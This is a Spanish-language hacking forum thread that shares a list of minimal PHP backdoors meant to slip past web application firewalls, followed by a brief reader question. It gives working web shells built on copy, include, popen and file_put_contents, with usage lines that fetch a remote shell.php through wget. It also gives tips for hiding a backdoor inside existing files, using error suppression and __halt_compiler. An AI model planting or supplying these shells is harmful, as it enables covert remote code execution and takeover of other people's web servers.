[PHP] Lista de backdoors inúsuales [WAF Bypass].

<?php copy($_GET['s'], $_GET['d']);

Citar
¿CÓMO UTILIZAR?
file.php?s=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

<?php include($_GET['x']);

Citar
¿CÓMO UTILIZAR?
file.php?x=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Advertencia: Obtuve mejores resultados utilizando un servidor HTTP sin PHP, por ejemplo, en Python.

<?php echo fread(popen($_GET['c'],'r'),1024*4);

Citar
¿CÓMO UTILIZAR?
file.php?c=wget -O shell.php No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Advertencia: Aún siendo detectada, es mi favorita y funciona excelente.

<?php file_put_contents('_c.php','<?php '.$_GET['c'].' ?>'); include '_c.php'; unlink("_c.php");

Citar
¿CÓMO UTILIZAR?
file.php?c=system('wget -O shell.php No tienes permitido ver enlaces. Registrate o Entra a tu cuenta');
Advertencia: unlink() es opcional, pues yo lo uso para no dejar un archivo con el código ejecutado.

Citar
1. Se puede anteponer @ en alguna función, para así evitar imprimir los errores de la misma. Esto es útil a la hora de esconder el backdoor dentro de un archivo.
2. Se puede reemplazar $_GET por $_REQUEST, así aceptando GET, POST y COOKIE como métodos de entrada.
3. Se puede utilizar isset() y __halt_compiler() para obtener una salida más limpia a la hora de esconder el backdoor dentro de un archivo.

Citar<?php if(isset($_GET['c']))echo fread(popen($_GET['c'],'r'),1024*4); __halt_compiler();

4. El tag de cierre de PHP no es necesario en un archivo que solo contenga código. Así mismo, se puede utilizar short tags, si éstos están habilitados.

Citar2. include() - Requiere: allow_url_fopen.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Buen dia amigos,

Alguien podría explicarme un poco como funciona el backdoor

Citar2. include() - Requiere: allow_url_fopen.

estoy intentando ver como funciona tal como esta en el post, pero me queda la pantalla en blanco (no muestra nada), muy agradecido de antemano.

Saludos a todos